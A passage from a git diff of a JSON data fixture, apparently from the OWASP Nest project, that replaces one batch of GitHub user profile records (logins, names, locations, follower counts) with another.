"2024-09-22T19:42:05.867Z", + "name": "", + "login": "becelot", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2139329?v=4", + "company": "@cancom", + "location": "Aachen, Germany", "collaborators_count": 0, - "following_count": 8, - "followers_count": 19, + "following_count": 1, + "followers_count": 9, "public_gists_count": 0, - "public_repositories_count": 77, - "created_at": "2012-03-29T11:33:27Z", - "updated_at": "2024-09-02T01:04:26Z", - "node_id": "MDQ6VXNlcjE1ODY3OTg=", + "public_repositories_count": 37, + "created_at": "2012-08-12T11:48:50Z", + "updated_at": "2024-07-24T20:28:16Z", + "node_id": "MDQ6VXNlcjIxMzkzMjk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -428303,24 +687877,24 @@ }, { "model": "github.user", - "pk": 2723, + "pk": 8079, "fields": { - "nest_created_at": "2024-09-12T02:08:27.224Z", - "nest_updated_at": "2024-09-12T02:08:27.224Z", - "name": "Edgars Kokorevičs", - "login": "edgecorelv", + "nest_created_at": "2024-09-22T09:41:19.881Z", + "nest_updated_at": "2024-09-22T19:42:06.795Z", + "name": "Kekke", + "login": "kekkegenkai", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/15019968?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/22821087?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 15, + "followers_count": 7, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2015-10-07T18:31:03Z", - "updated_at": "2024-08-07T16:49:23Z", - "node_id": "MDQ6VXNlcjE1MDE5OTY4", + "public_repositories_count": 8, + "created_at": "2016-10-13T16:44:26Z", + "updated_at": "2024-09-13T14:23:12Z", + "node_id": "MDQ6VXNlcjIyODIxMDg3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -428328,49 +687902,49 @@ }, { "model": "github.user", - "pk": 2724, + "pk": 8080, "fields": { - "nest_created_at": "2024-09-12T02:08:33.339Z", - "nest_updated_at": "2024-09-12T02:08:33.339Z", - "name": "Bob Clingan", - "login": "bclingan", + "nest_created_at": "2024-09-22T09:41:21.159Z", + "nest_updated_at": "2024-09-22T19:40:26.059Z", + "name": "Martijn van der Made", + "login": "mvandermade", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/38579?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/33425497?v=4", "company": "", - "location": "Bel Air, MD", + "location": "", "collaborators_count": 0, - "following_count": 4, + "following_count": 5, "followers_count": 5, - "public_gists_count": 2, - "public_repositories_count": 4, - "created_at": "2008-12-05T19:31:25Z", - "updated_at": "2024-05-31T19:21:57Z", - "node_id": "MDQ6VXNlcjM4NTc5", + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2017-11-06T15:13:56Z", + "updated_at": "2024-09-15T16:03:55Z", + "node_id": "MDQ6VXNlcjMzNDI1NDk3", "bio": "", - "is_hireable": true, + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2725, + "pk": 8081, "fields": { - "nest_created_at": "2024-09-12T02:08:34.960Z", - "nest_updated_at": "2024-09-12T02:08:34.960Z", - "name": "", - "login": "richard-diederen", + "nest_created_at": "2024-09-22T09:41:22.417Z", + "nest_updated_at": "2024-09-22T19:42:08.715Z", + "name": "Anton Roman", + "login": "antonroman", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/15132384?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/4015457?v=4", "company": "", - "location": "", + "location": "Baiona, Spain", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 9, + "followers_count": 7, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2015-10-14T22:22:53Z", - "updated_at": "2023-01-20T21:18:29Z", - "node_id": "MDQ6VXNlcjE1MTMyMzg0", + "public_repositories_count": 18, + "created_at": "2013-03-30T20:21:42Z", + "updated_at": "2024-09-22T17:42:48Z", + "node_id": "MDQ6VXNlcjQwMTU0NTc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -428378,24 +687952,24 @@ }, { "model": "github.user", - "pk": 2726, + "pk": 8082, "fields": { - "nest_created_at": "2024-09-12T02:08:36.600Z", - "nest_updated_at": "2024-09-12T02:08:36.600Z", - "name": "Sébastien Delcoigne", - "login": "sebD", + "nest_created_at": "2024-09-22T09:41:22.730Z", + "nest_updated_at": "2024-09-22T19:42:09.041Z", + "name": "Bram Verburg", + "login": "voltone", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/934062?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/860282?v=4", "company": "", - "location": "Melbourne, Victoria, Australia", + "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2011-07-23T11:28:45Z", - "updated_at": "2024-06-04T03:16:05Z", - "node_id": "MDQ6VXNlcjkzNDA2Mg==", + "followers_count": 52, + "public_gists_count": 1, + "public_repositories_count": 43, + "created_at": "2011-06-19T19:33:38Z", + "updated_at": "2023-07-05T18:44:04Z", + "node_id": "MDQ6VXNlcjg2MDI4Mg==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -428403,24 +687977,24 @@ }, { "model": "github.user", - "pk": 2727, + "pk": 8083, "fields": { - "nest_created_at": "2024-09-12T02:08:38.228Z", - "nest_updated_at": "2024-09-12T02:08:38.228Z", - "name": "Matthias Vogel", - "login": "Kanti", + "nest_created_at": "2024-09-22T09:41:23.038Z", + "nest_updated_at": "2024-09-22T19:42:09.352Z", + "name": "Collin", + "login": "Collinux", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/471387?v=4", - "company": "@andersundsehr", - "location": "Stuttgart - Germany", + "avatar_url": "https://avatars.githubusercontent.com/u/3580553?v=4", + "company": "", + "location": " /dev/null", "collaborators_count": 0, - "following_count": 13, - "followers_count": 23, - "public_gists_count": 16, - "public_repositories_count": 71, - "created_at": "2010-11-07T18:36:09Z", - "updated_at": "2024-08-20T16:48:37Z", - "node_id": "MDQ6VXNlcjQ3MTM4Nw==", + "following_count": 11, + "followers_count": 35, + "public_gists_count": 1, + "public_repositories_count": 13, + "created_at": "2013-02-13T02:36:51Z", + "updated_at": "2024-09-13T11:52:21Z", + "node_id": "MDQ6VXNlcjM1ODA1NTM=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -428428,49 +688002,49 @@ }, { "model": "github.user", - "pk": 2728, + "pk": 8084, "fields": { - "nest_created_at": "2024-09-12T02:08:40.380Z", - "nest_updated_at": "2024-09-12T02:08:40.380Z", + "nest_created_at": "2024-09-22T09:41:23.990Z", + "nest_updated_at": "2024-09-22T19:40:28.921Z", "name": "", - "login": "JasonTheProgrammer", + "login": "dimitri-rebrikov", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/17895269?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5622327?v=4", "company": "", - "location": "", + "location": "Germany", "collaborators_count": 0, "following_count": 1, - "followers_count": 0, - "public_gists_count": 1, - "public_repositories_count": 1, - "created_at": "2016-03-17T04:32:38Z", - "updated_at": "2024-09-10T20:32:17Z", - "node_id": "MDQ6VXNlcjE3ODk1MjY5", - "bio": "My name is Jason, I am a programmer.", + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 19, + "created_at": "2013-10-06T12:08:59Z", + "updated_at": "2024-08-28T13:23:27Z", + "node_id": "MDQ6VXNlcjU2MjIzMjc=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2729, + "pk": 8085, "fields": { - "nest_created_at": "2024-09-12T02:08:49.917Z", - "nest_updated_at": "2024-09-12T02:08:49.917Z", - "name": "Terror", - "login": "mterron", + "nest_created_at": "2024-09-22T09:41:24.594Z", + "nest_updated_at": "2024-09-22T19:40:29.239Z", + "name": "Dmitry Baburkin", + "login": "baburkin", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/4434907?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/3738053?v=4", "company": "", - "location": "", + "location": "Bahrain", "collaborators_count": 0, - "following_count": 8, - "followers_count": 9, + "following_count": 7, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 27, - "created_at": "2013-05-15T06:42:38Z", - "updated_at": "2024-09-03T11:26:35Z", - "node_id": "MDQ6VXNlcjQ0MzQ5MDc=", + "public_repositories_count": 8, + "created_at": "2013-03-01T12:43:51Z", + "updated_at": "2024-08-31T10:55:13Z", + "node_id": "MDQ6VXNlcjM3MzgwNTM=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -428478,49 +688052,49 @@ }, { "model": "github.user", - "pk": 2730, + "pk": 8086, "fields": { - "nest_created_at": "2024-09-12T02:08:51.997Z", - "nest_updated_at": "2024-09-12T02:08:51.997Z", - "name": "Christian", - "login": "criskeks", + "nest_created_at": "2024-09-22T09:41:24.911Z", + "nest_updated_at": "2024-09-22T19:42:10.353Z", + "name": "Seb", + "login": "DrakezulsMinimalism", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/167431463?v=4", - "company": "Soest, Germany", + "avatar_url": "https://avatars.githubusercontent.com/u/68729632?v=4", + "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2024-04-18T11:47:09Z", - "updated_at": "2024-04-18T12:26:47Z", - "node_id": "U_kgDOCfrNJw", - "bio": "\"sure\"", + "public_repositories_count": 2, + "created_at": "2020-07-24T07:49:04Z", + "updated_at": "2024-05-03T11:29:40Z", + "node_id": "MDQ6VXNlcjY4NzI5NjMy", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2731, + "pk": 8087, "fields": { - "nest_created_at": "2024-09-12T02:08:54.143Z", - "nest_updated_at": "2024-09-12T02:08:55.371Z", - "name": "iLdar", - "login": "tyreckiu", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/71664399?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:41:25.223Z", + "nest_updated_at": "2024-09-22T19:40:29.869Z", + "name": "Dustin Decker", + "login": "dustin-decker", + "email": "humanatcomputer@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6031416?v=4", + "company": "Truffle Security Co.", + "location": "San Francisco", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2020-09-21T18:03:17Z", - "updated_at": "2024-08-30T10:02:42Z", - "node_id": "MDQ6VXNlcjcxNjY0Mzk5", + "following_count": 100, + "followers_count": 100, + "public_gists_count": 1, + "public_repositories_count": 124, + "created_at": "2013-11-25T13:52:18Z", + "updated_at": "2024-09-22T11:34:18Z", + "node_id": "MDQ6VXNlcjYwMzE0MTY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -428528,49 +688102,49 @@ }, { "model": "github.user", - "pk": 2732, + "pk": 8088, "fields": { - "nest_created_at": "2024-09-12T02:09:00.692Z", - "nest_updated_at": "2024-09-12T02:09:00.692Z", - "name": "Toe Khaing Oo", - "login": "toekhaing", + "nest_created_at": "2024-09-22T09:41:26.541Z", + "nest_updated_at": "2024-09-22T19:40:31.287Z", + "name": "Greg Back", + "login": "gtback", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6739256?v=4", - "company": "", - "location": "Bangkok, Thailand", + "avatar_url": "https://avatars.githubusercontent.com/u/1045796?v=4", + "company": "@elastic", + "location": "Indiana, US", "collaborators_count": 0, - "following_count": 47, - "followers_count": 21, - "public_gists_count": 1, - "public_repositories_count": 32, - "created_at": "2014-02-20T16:03:59Z", - "updated_at": "2024-08-14T09:06:55Z", - "node_id": "MDQ6VXNlcjY3MzkyNTY=", - "bio": "Security Enthusiast", - "is_hireable": true, + "following_count": 119, + "followers_count": 149, + "public_gists_count": 8, + "public_repositories_count": 118, + "created_at": "2011-09-12T22:13:59Z", + "updated_at": "2024-09-14T11:26:43Z", + "node_id": "MDQ6VXNlcjEwNDU3OTY=", + "bio": "", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2733, + "pk": 8089, "fields": { - "nest_created_at": "2024-09-12T02:09:29.058Z", - "nest_updated_at": "2024-09-12T02:09:29.058Z", - "name": "", - "login": "tylerforajter", + "nest_created_at": "2024-09-22T09:41:26.854Z", + "nest_updated_at": "2024-09-22T19:40:31.599Z", + "name": "Jakub Rak", + "login": "jakubrak", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/100237457?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7059008?v=4", + "company": "@dynatrace", + "location": "Gdańsk, Poland", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2022-02-22T20:17:22Z", - "updated_at": "2024-06-13T14:45:28Z", - "node_id": "U_kgDOBfmAkQ", + "following_count": 10, + "followers_count": 5, + "public_gists_count": 3, + "public_repositories_count": 8, + "created_at": "2014-03-25T13:38:27Z", + "updated_at": "2024-09-16T13:26:17Z", + "node_id": "MDQ6VXNlcjcwNTkwMDg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -428578,24 +688152,24 @@ }, { "model": "github.user", - "pk": 2734, + "pk": 8090, "fields": { - "nest_created_at": "2024-09-12T02:09:45.068Z", - "nest_updated_at": "2024-09-12T02:09:45.068Z", + "nest_created_at": "2024-09-22T09:41:27.179Z", + "nest_updated_at": "2024-09-22T19:42:10.981Z", "name": "", - "login": "andrejpohlmann", + "login": "jensborrmann", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/17292191?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5812656?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2016-02-17T10:45:32Z", - "updated_at": "2024-07-02T12:03:14Z", - "node_id": "MDQ6VXNlcjE3MjkyMTkx", + "public_repositories_count": 2, + "created_at": "2013-10-30T10:29:32Z", + "updated_at": "2024-09-18T06:12:03Z", + "node_id": "MDQ6VXNlcjU4MTI2NTY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -428603,24 +688177,24 @@ }, { "model": "github.user", - "pk": 2735, + "pk": 8091, "fields": { - "nest_created_at": "2024-09-12T02:09:46.291Z", - "nest_updated_at": "2024-09-12T02:09:46.291Z", - "name": "", - "login": "numa1985", + "nest_created_at": "2024-09-22T09:41:28.477Z", + "nest_updated_at": "2024-09-22T19:40:33.155Z", + "name": "Kristóf Havasi", + "login": "lnksz", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/139448875?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/15908859?v=4", + "company": "@EFR-GmbH ", "location": "", "collaborators_count": 0, - "following_count": 0, + "following_count": 21, "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 13, - "created_at": "2023-07-13T08:57:55Z", - "updated_at": "2024-01-31T10:44:22Z", - "node_id": "U_kgDOCE_SKw", + "public_gists_count": 19, + "public_repositories_count": 20, + "created_at": "2015-11-18T13:47:53Z", + "updated_at": "2024-09-13T07:14:30Z", + "node_id": "MDQ6VXNlcjE1OTA4ODU5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -428628,74 +688202,74 @@ }, { "model": "github.user", - "pk": 2736, + "pk": 8092, "fields": { - "nest_created_at": "2024-09-12T02:09:55.197Z", - "nest_updated_at": "2024-09-12T02:09:55.197Z", - "name": "Christian Mathis", - "login": "chrismathis", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5596296?v=4", + "nest_created_at": "2024-09-22T09:41:29.131Z", + "nest_updated_at": "2024-09-22T19:40:33.807Z", + "name": "Lovro Grgurić Mileusnić", + "login": "lgrguricmileusnic", + "email": "lovrogm@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/35634240?v=4", "company": "", - "location": "Vorarlberg, Austria", + "location": "Zagreb, Croatia", "collaborators_count": 0, - "following_count": 3, - "followers_count": 4, + "following_count": 5, + "followers_count": 5, "public_gists_count": 0, "public_repositories_count": 11, - "created_at": "2013-10-02T16:31:18Z", - "updated_at": "2024-08-21T11:51:19Z", - "node_id": "MDQ6VXNlcjU1OTYyOTY=", + "created_at": "2018-01-20T16:37:38Z", + "updated_at": "2024-08-27T09:44:02Z", + "node_id": "MDQ6VXNlcjM1NjM0MjQw", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2737, + "pk": 8093, "fields": { - "nest_created_at": "2024-09-12T02:10:25.331Z", - "nest_updated_at": "2024-09-12T02:10:25.332Z", - "name": "Pat Heard", - "login": "patheard", - "email": "patrick.heard@cds-snc.ca", - "avatar_url": "https://avatars.githubusercontent.com/u/2110107?v=4", - "company": "@cds-snc ", - "location": "Ottawa, ON", + "nest_created_at": "2024-09-22T09:41:30.418Z", + "nest_updated_at": "2024-09-22T19:42:13.235Z", + "name": "", + "login": "heintmaSICKAG", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/89395167?v=4", + "company": "SICK AG", + "location": "Freiburg", "collaborators_count": 0, - "following_count": 3, - "followers_count": 28, - "public_gists_count": 4, - "public_repositories_count": 52, - "created_at": "2012-08-07T13:26:59Z", - "updated_at": "2024-08-25T22:47:43Z", - "node_id": "MDQ6VXNlcjIxMTAxMDc=", - "bio": "Site Reliability Engineer", + "following_count": 4, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-08-23T12:37:21Z", + "updated_at": "2024-08-07T06:13:35Z", + "node_id": "MDQ6VXNlcjg5Mzk1MTY3", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2738, + "pk": 8094, "fields": { - "nest_created_at": "2024-09-12T02:10:27.809Z", - "nest_updated_at": "2024-09-12T02:10:27.809Z", - "name": "Shafeequr Rehman Mohammed", - "login": "mos9mu", + "nest_created_at": "2024-09-22T09:41:30.724Z", + "nest_updated_at": "2024-09-22T19:41:14.023Z", + "name": "", + "login": "vandermeij-martijn", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/117162895?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/148962606?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, + "following_count": 1, "followers_count": 0, "public_gists_count": 0, "public_repositories_count": 0, - "created_at": "2022-11-01T09:55:30Z", - "updated_at": "2024-03-28T11:36:55Z", - "node_id": "U_kgDOBvvDjw", + "created_at": "2023-10-25T09:50:13Z", + "updated_at": "2024-05-21T11:02:14Z", + "node_id": "U_kgDOCOD9Lg", "bio": "", "is_hireable": false, "twitter_username": "" @@ -428703,74 +688277,74 @@ }, { "model": "github.user", - "pk": 2739, + "pk": 8095, "fields": { - "nest_created_at": "2024-09-12T02:10:28.642Z", - "nest_updated_at": "2024-09-18T19:07:25.392Z", - "name": "", - "login": "freshpr", + "nest_created_at": "2024-09-22T09:41:45.881Z", + "nest_updated_at": "2024-09-22T19:40:50.762Z", + "name": "Tilak Thimmappa", + "login": "tilakthimmappa", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/65549906?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/9658374?v=4", "company": "", - "location": "", + "location": "Bengaluru", "collaborators_count": 0, - "following_count": 2, - "followers_count": 1, + "following_count": 0, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2020-05-18T13:55:00Z", - "updated_at": "2024-05-16T07:30:34Z", - "node_id": "MDQ6VXNlcjY1NTQ5OTA2", - "bio": "", + "public_repositories_count": 11, + "created_at": "2014-11-10T15:33:14Z", + "updated_at": "2024-07-30T02:55:01Z", + "node_id": "MDQ6VXNlcjk2NTgzNzQ=", + "bio": "I have contributed multiple opensource projects. Recently I have created a python package vulnerability analyzer called PyRaider.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "tilakthimmappa" } }, { "model": "github.user", - "pk": 2740, + "pk": 8096, "fields": { - "nest_created_at": "2024-09-12T02:10:38.605Z", - "nest_updated_at": "2024-09-12T02:10:38.605Z", - "name": "Jiří Altman", - "login": "JuryA", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/11990780?v=4", + "nest_created_at": "2024-09-22T09:41:56.121Z", + "nest_updated_at": "2024-09-22T19:42:22.349Z", + "name": "Juuso Tapaninen", + "login": "Pinqvin", + "email": "juuso.tapaninen@iki.fi", + "avatar_url": "https://avatars.githubusercontent.com/u/1911379?v=4", "company": "", - "location": "Brno, Czech Republic", + "location": "Finland", "collaborators_count": 0, - "following_count": 132, - "followers_count": 30, - "public_gists_count": 37, - "public_repositories_count": 364, - "created_at": "2015-04-17T08:01:14Z", - "updated_at": "2024-08-07T07:11:22Z", - "node_id": "MDQ6VXNlcjExOTkwNzgw", - "bio": "\"Konstrukční dokonalosti není dosaženo tehdy, když už není co přidat, ale tehdy, když už nemůžete nic odebrat.\" -- Eric S. Raymond (Katedrála a tržiště)", + "following_count": 4, + "followers_count": 22, + "public_gists_count": 4, + "public_repositories_count": 26, + "created_at": "2012-07-01T16:41:33Z", + "updated_at": "2024-09-19T10:16:00Z", + "node_id": "MDQ6VXNlcjE5MTEzNzk=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2741, + "pk": 8097, "fields": { - "nest_created_at": "2024-09-12T02:10:39.451Z", - "nest_updated_at": "2024-09-18T19:07:29.787Z", - "name": "Martin Dobrev", - "login": "mclueppers", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/370615?v=4", - "company": "@dobrevit ", - "location": "London, UK", + "nest_created_at": "2024-09-22T09:41:59.300Z", + "nest_updated_at": "2024-09-22T19:42:29.693Z", + "name": "", + "login": "molusk", + "email": "molusk@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/17114364?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 6, - "public_gists_count": 8, - "public_repositories_count": 34, - "created_at": "2010-08-20T08:58:17Z", - "updated_at": "2024-08-16T10:15:09Z", - "node_id": "MDQ6VXNlcjM3MDYxNQ==", + "following_count": 0, + "followers_count": 1, + "public_gists_count": 1, + "public_repositories_count": 6, + "created_at": "2016-02-07T23:18:21Z", + "updated_at": "2024-09-17T13:18:25Z", + "node_id": "MDQ6VXNlcjE3MTE0MzY0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -428778,49 +688352,49 @@ }, { "model": "github.user", - "pk": 2742, + "pk": 8098, "fields": { - "nest_created_at": "2024-09-12T02:10:42.038Z", - "nest_updated_at": "2024-09-12T02:10:42.038Z", - "name": "Dani Hengeveld", - "login": "danihengeveld", - "email": "dani10hengeveld@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/25222020?v=4", - "company": "@InfoSupportNederland", - "location": "Anholt, Nordrhein-Westfalen, Germany", + "nest_created_at": "2024-09-22T09:42:00.311Z", + "nest_updated_at": "2024-09-22T19:41:06.944Z", + "name": "Martijn van der Meij", + "login": "Squixx", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/24840050?v=4", + "company": "", + "location": "", "collaborators_count": 0, "following_count": 2, - "followers_count": 2, + "followers_count": 1, "public_gists_count": 0, "public_repositories_count": 10, - "created_at": "2017-01-19T10:31:14Z", - "updated_at": "2024-09-11T13:35:44Z", - "node_id": "MDQ6VXNlcjI1MjIyMDIw", - "bio": "IT Consultant at Info Support", + "created_at": "2016-12-30T09:48:48Z", + "updated_at": "2024-09-07T16:26:41Z", + "node_id": "MDQ6VXNlcjI0ODQwMDUw", + "bio": "", "is_hireable": false, - "twitter_username": "HengeveldDani" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2743, + "pk": 8099, "fields": { - "nest_created_at": "2024-09-12T02:10:44.198Z", - "nest_updated_at": "2024-09-13T05:08:45.229Z", + "nest_created_at": "2024-09-22T09:42:01.299Z", + "nest_updated_at": "2024-09-22T19:42:26.546Z", "name": "", - "login": "dggarciabase", + "login": "mge-mm", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/175609458?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/146430605?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2024-07-15T10:57:20Z", - "updated_at": "2024-07-15T10:59:47Z", - "node_id": "U_kgDOCneWcg", + "public_repositories_count": 2, + "created_at": "2023-09-29T09:27:13Z", + "updated_at": "2024-08-14T11:11:22Z", + "node_id": "U_kgDOCLpajQ", "bio": "", "is_hireable": false, "twitter_username": "" @@ -428828,24 +688402,24 @@ }, { "model": "github.user", - "pk": 2744, + "pk": 8100, "fields": { - "nest_created_at": "2024-09-12T02:11:37.885Z", - "nest_updated_at": "2024-09-12T02:13:28.327Z", - "name": "meha", - "login": "mehab", + "nest_created_at": "2024-09-22T09:42:01.611Z", + "nest_updated_at": "2024-09-22T19:41:08.273Z", + "name": "zeed zhao", + "login": "zeed-w-beez", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/26340948?v=4", - "company": "Citi", - "location": "London", + "avatar_url": "https://avatars.githubusercontent.com/u/20834022?v=4", + "company": "", + "location": "Shanghai, China", "collaborators_count": 0, - "following_count": 2, + "following_count": 1, "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2017-03-11T06:52:41Z", - "updated_at": "2024-08-27T11:45:06Z", - "node_id": "MDQ6VXNlcjI2MzQwOTQ4", + "public_repositories_count": 31, + "created_at": "2016-08-04T07:49:55Z", + "updated_at": "2024-07-27T06:14:31Z", + "node_id": "MDQ6VXNlcjIwODM0MDIy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -428853,24 +688427,24 @@ }, { "model": "github.user", - "pk": 2745, + "pk": 8101, "fields": { - "nest_created_at": "2024-09-12T02:12:20.401Z", - "nest_updated_at": "2024-09-18T00:18:58.026Z", + "nest_created_at": "2024-09-22T09:42:02.578Z", + "nest_updated_at": "2024-09-22T19:41:09.223Z", "name": "", - "login": "VithikaS", + "login": "fupgang", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/122881935?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/75629871?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 3, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2023-01-17T11:59:02Z", - "updated_at": "2024-09-11T12:59:13Z", - "node_id": "U_kgDOB1MHjw", + "public_repositories_count": 5, + "created_at": "2020-12-07T15:52:47Z", + "updated_at": "2024-09-04T12:41:25Z", + "node_id": "MDQ6VXNlcjc1NjI5ODcx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -428878,49 +688452,24 @@ }, { "model": "github.user", - "pk": 2746, - "fields": { - "nest_created_at": "2024-09-12T02:13:33.763Z", - "nest_updated_at": "2024-09-12T02:13:33.763Z", - "name": "Michal Frystacky", - "login": "MFry", - "email": "codefry+git@pm.me", - "avatar_url": "https://avatars.githubusercontent.com/u/579618?v=4", - "company": "", - "location": "Orlando, FL", - "collaborators_count": 0, - "following_count": 7, - "followers_count": 9, - "public_gists_count": 8, - "public_repositories_count": 47, - "created_at": "2011-01-23T20:01:47Z", - "updated_at": "2024-08-14T16:08:22Z", - "node_id": "MDQ6VXNlcjU3OTYxOA==", - "bio": "Software Architect and Full Stack Developer.", - "is_hireable": true, - "twitter_username": "" - } -}, -{ - "model": "github.user", - "pk": 2747, + "pk": 8102, "fields": { - "nest_created_at": "2024-09-12T02:14:10.419Z", - "nest_updated_at": "2024-09-12T02:14:10.419Z", - "name": "Mykhailo Sindieiev", - "login": "mikesindieiev", + "nest_created_at": "2024-09-22T09:42:04.474Z", + "nest_updated_at": "2024-09-22T19:42:30.031Z", + "name": "Matt Beaumont", + "login": "mattmatician", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/9822870?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/16903375?v=4", "company": "", - "location": "Barcelona, Spain", + "location": "United Kingdom", "collaborators_count": 0, - "following_count": 1, - "followers_count": 1, - "public_gists_count": 1, - "public_repositories_count": 5, - "created_at": "2014-11-18T13:40:45Z", - "updated_at": "2024-09-02T14:29:48Z", - "node_id": "MDQ6VXNlcjk4MjI4NzA=", + "following_count": 3, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2016-01-26T17:31:43Z", + "updated_at": "2024-08-06T16:09:50Z", + "node_id": "MDQ6VXNlcjE2OTAzMzc1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -428928,24 +688477,24 @@ }, { "model": "github.user", - "pk": 2748, + "pk": 8103, "fields": { - "nest_created_at": "2024-09-12T02:14:23.990Z", - "nest_updated_at": "2024-09-12T02:14:23.990Z", - "name": "Strakeln", - "login": "Strakeln", + "nest_created_at": "2024-09-22T09:42:04.916Z", + "nest_updated_at": "2024-09-22T19:42:30.339Z", + "name": "Takuya Iwatsuka", + "login": "tiwatsuka", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/101366557?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/12785901?v=4", "company": "", - "location": "", + "location": "Tokyo, Japan", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-03-10T21:48:11Z", - "updated_at": "2024-01-29T18:51:55Z", - "node_id": "U_kgDOBgq7HQ", + "followers_count": 1, + "public_gists_count": 1, + "public_repositories_count": 31, + "created_at": "2015-06-07T15:42:30Z", + "updated_at": "2024-09-20T00:42:36Z", + "node_id": "MDQ6VXNlcjEyNzg1OTAx", "bio": "", 